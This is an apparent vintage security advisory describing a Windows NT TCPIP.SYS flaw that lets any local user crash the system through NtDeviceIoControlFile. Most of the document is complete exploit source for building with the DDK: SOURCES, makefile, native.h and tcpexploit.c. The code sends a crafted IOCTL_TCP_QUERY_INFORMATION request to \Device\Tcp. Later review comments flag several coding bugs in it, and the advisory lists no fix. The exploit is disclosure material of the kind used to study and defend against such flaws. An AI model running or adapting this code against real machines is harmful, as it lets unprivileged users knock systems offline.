COMMAND

    TCPIP.SYS

SYSTEMS AFFECTED

    Win NT systems

PROBLEM

    Luigi Mori found the following.  Playing with TCPIP.SYS he noticed
    that every user could crash the local system with an
    IRQL_NOT_LESS_OR_EQUAL exception just by calling the undocumented
    function NtDeviceIoControlFile with a handle to TCPIP and the
    "right" parameters.  NtDeviceIoControlFile is the native
    counterpart of DeviceIoControl and is called by InetMib1.dll and
    WINSOCK Helper DLLs to retrieve TCPIP statistics, so no special
    rights are needed to run the exploit.  The bug resides in the
    TCPIP.SYS InternalIoControl dispatch routine, which lacks a check
    on the current IRQL level before processing the query information
    request.  This is the exploit (you should compile it with the DDK):

    --------------- begin SOURCES ---------------------------

    TARGETNAME= tcpinfo
    TARGETPATH= .
    TARGETTYPE= PROGRAM

    INCLUDES=       .; ..\; \DDK\inc;\DDK\src\network\inc

    SOURCES=        tcpinfo.c

    UMTYPE=         console
    UMBASE=         0x400000
    UMLIBS=         \DDK\lib\i386\checked\ntdll.lib
    --------------- end SOURCES -----------------------------
    --------------- begin makefile --------------------------
    #
    # DO NOT EDIT THIS FILE!!!  Edit .\sources. if you want to add a new source
    # file to this component.  This file merely indirects to the real make file
    # that is shared by all the driver components of the Windows NT DDK
    #

    !INCLUDE $(NTMAKEENV)\makefile.def
    --------------- end makefile ----------------------------
    --------------- begin native.h --------------------------
    #ifndef gigi_native_h
    #define gigi_native_h

    /* Hand-rolled status/event pair handed to NtDeviceIoControlFile
     * (tcp_query_information passes &prova as the IoStatusBlock argument
     * and prova.hevent as the Event argument).
     * NOTE(review): bo/result presumably mirror IO_STATUS_BLOCK's
     * Status/Information with the event handle appended — confirm the
     * layout against the DDK header before relying on either field. */
    typedef struct {
	    unsigned int    bo;
	    unsigned int    result;
	    HANDLE                          hevent; /* created per call in tcp_query_information */
    } nt_overlapped;

    /* IOCTL code sent to \Device\Tcp by tcp_query_information. */
    #define IOCTL_TCP_QUERY_INFORMATION     0x120003
    #endif /* gigi_native_h */
    -------------- end native.h ----------------------------
    -------------- begin tcpexploit.c ------------------------
    #include 
    #include 
    #include 
    #include "native.h"

    #define MAX_NAME_LEN    256 /* element count of the WCHAR scratch buffer in open_tcp */

    /* Process-wide state: the \Device\Tcp handle (opened by open_tcp,
     * closed by close_tcp) and the output buffer main hands to the
     * query IOCTL together with sizeof(g.buff). */
    struct {
	    HANDLE  h_tcp;
	    char    buff[0x400];
    } g;


    /*
     * Open a handle to \Device\Tcp and store it in g.h_tcp.
     *
     * Returns 1 on success, 0 on failure (an error line is printed).
     *
     * NOTE(review): the desired-access argument is the raw literal
     * 0x20000000 rather than a named access constant — confirm which
     * right was intended; a named constant would make the review easier.
     */
    unsigned int
    open_tcp()
    {
	    OBJECT_ATTRIBUTES       object_attrs;
	    UNICODE_STRING  device_tcp;
	    WCHAR   device_tcp_buff[MAX_NAME_LEN]; /* effectively unused, see below */
	    IO_STATUS_BLOCK io_status_block;
	    NTSTATUS        status;

	    /* Dead store with a type mismatch: &device_tcp_buff is a pointer to
	     * the whole array, not a WCHAR *, and RtlInitUnicodeString below
	     * points Buffer at the string literal anyway. */
	    device_tcp.Buffer = &device_tcp_buff;
	    RtlInitUnicodeString(&device_tcp, L"\\Device\\Tcp");

	    InitializeObjectAttributes(&object_attrs, &device_tcp,
				    OBJ_CASE_INSENSITIVE, NULL, NULL);

	    status = ZwCreateFile(&g.h_tcp, 0x20000000, &object_attrs,
			    &io_status_block, 0,
			    FILE_ATTRIBUTE_NORMAL, FILE_SHARE_READ|FILE_SHARE_WRITE,
			    FILE_OPEN_IF,
			    0, NULL, 0);
	    if(status != STATUS_SUCCESS) {
		    /* BUG: io_status_block is a struct passed for a %#x conversion,
		     * which is undefined behaviour; io_status_block.Status is what
		     * was presumably meant. */
		    printf("ZwCreateFile error %#x %#x\n", status, io_status_block);

		    return 0;
	    }

	    return 1;
    }

    /* Release the handle opened by open_tcp; the ZwClose status is discarded. */
    void
    close_tcp()
    {
	    ZwClose(g.h_tcp);
    }

    /*
     * Issue IOCTL_TCP_QUERY_INFORMATION on g.h_tcp with the caller's input
     * and output buffers, using a freshly created event for completion.
     *
     * Returns 0 only when the event cannot be created; otherwise it returns
     * 1 and merely prints the NtDeviceIoControlFile status, so the caller
     * cannot distinguish a failed query from a successful one.
     *
     * NOTE(review): the event access mask 0x1F003 looks one digit short of
     * EVENT_ALL_ACCESS (0x1F0003) — confirm. The NtCreateEvent error format
     * "0x#x" has no conversion specifier, so status is never printed and the
     * extra printf argument is silently ignored. Locals i and p are unused.
     */
    unsigned int
    tcp_query_information(void *in_buff, unsigned int in_buff_len,

	    void *out_buff, unsigned int out_buff_len)
    {
	    NTSTATUS        status;
	    nt_overlapped   prova;  /* doubles as the IoStatusBlock argument below */
	    unsigned int i, *p;

	    status = NtCreateEvent(&prova.hevent, 0x1F003, 0, 1, NULL);
	    if(status != STATUS_SUCCESS) {
		    printf("NtCreateEvent error 0x#x\n", status);

		    return 0;
	    }

	    status =  NtDeviceIoControlFile(g.h_tcp, prova.hevent, 0, 0,
			    &prova, IOCTL_TCP_QUERY_INFORMATION, in_buff,
			    in_buff_len, out_buff, out_buff_len);

	    ZwClose(prova.hevent);

	    /* The status is printed but never checked; NTSTATUS is a signed
	     * type, so %#X is a mismatched conversion for it. */
	    printf("%#X\n", status);

	    return 1;
    }

    /*
     * Entry point: open \Device\Tcp, send a single query-information request
     * built from a struct tcp_request_query_information_ex, then close the
     * handle.
     *
     * NOTE(review): only the ID member of in_buff is assigned; any remaining
     * members are uninitialised stack when the struct is handed to the
     * driver, and the input length is the hard-coded 0x24 rather than
     * sizeof in_buff — confirm both against the DDK definition. On the
     * early-return path after a failed query the handle is not closed (the
     * process exits anyway). `void __cdecl main()` is a non-standard
     * signature; int main(void) is the portable form.
     */
    void    __cdecl
    main()
    {
	    struct tcp_request_query_information_ex in_buff;

	    if(!open_tcp()) {
		    return;
	    }

	    /* Request identification fields only; see the note above about the
	     * rest of the struct. */
	    in_buff.ID.toi_entity.tei_entity = CO_TL_ENTITY;
	    in_buff.ID.toi_entity.tei_instance = 0;
	    in_buff.ID.toi_class = INFO_CLASS_PROTOCOL;
	    in_buff.ID.toi_type = INFO_TYPE_CONNECTION;
	    in_buff.ID.toi_id = 0x5;

	    /* tcp_query_information only returns 0 on event-creation failure,
	     * so this check does not reflect the outcome of the IOCTL itself. */
	    if(!tcp_query_information(&in_buff, 0x24, g.buff, sizeof(g.buff))) {
		    return;
	    }

	    close_tcp();
    }
    ----------------- end tcpexploit.c ---------------------------------

SOLUTION

    Nothing yet.